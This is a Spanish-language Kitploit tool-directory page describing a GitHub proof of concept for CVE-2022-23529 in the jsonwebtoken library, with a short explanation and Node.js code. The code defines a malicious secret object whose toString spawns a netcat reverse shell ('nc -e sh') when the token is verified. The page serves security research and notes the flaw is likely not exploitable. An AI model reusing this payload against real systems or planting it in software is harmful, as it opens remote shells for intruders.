Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-23529-Exploration — Prueba de concepto del exploit para CVE-2022-23529, que demuestra la ejecución remota de código (RCE) en librerías JWT vulnerables mediante objetos maliciosos de secreto HMAC. | Kitploit
Herramientas/GitHubGitHub/daniel-marchi/cve-2022-23529-exploration
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de PenetraciónDesarrollo de Payloads
GitHubdaniel-marchi/cve-2022-23529-exploration

CVE-2022-23529-Exploration

Prueba de concepto del exploit para CVE-2022-23529, que demuestra la ejecución remota de código (RCE) en librerías JWT vulnerables mediante objetos maliciosos de secreto HMAC.

Ver Repositorio
hace 3 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-23529

Las versiones de la librería JSON Web Token (JWT) anteriores a 3.4.6, 4.0.4 y 4.1.5 son vulnerables a RCE.

Las funciones hash HMAC aceptan cualquier cadena como entrada, lo que conduce a RCE.

Debido a las condiciones previas, es probable que esta vulnerabilidad no sea explotable.

Para explotar esta vulnerabilidad, un atacante necesitaría que se cumpla una de las siguientes condiciones:

  • El servidor no almacena las claves secretas de forma segura.
  • El atacante necesita tener acceso a las claves secretas y controlarlas.

npm install [email protected]

var jwt = require('jsonwebtoken');

create a token using the servers secret

var token = jwt.sign({"x":"y"}, 'servers_secret');

create malicious object containing a reverse shell (node.js)

root@kitploit:~
var poisoned_secret_on_server = { 
    toString : ()=> {console.log('PWNED AFTER PASRSING TOKEN');
        process.on('exit', ()=> {
            require('child_process').exec('nc -e sh 127.0.0.1 9001');
        });
        process.exit(0)
    }
}

server verifies the token using malicious object stored as secret

jwt.verify(token, poisoned_secret_on_server);

Descargar herramienta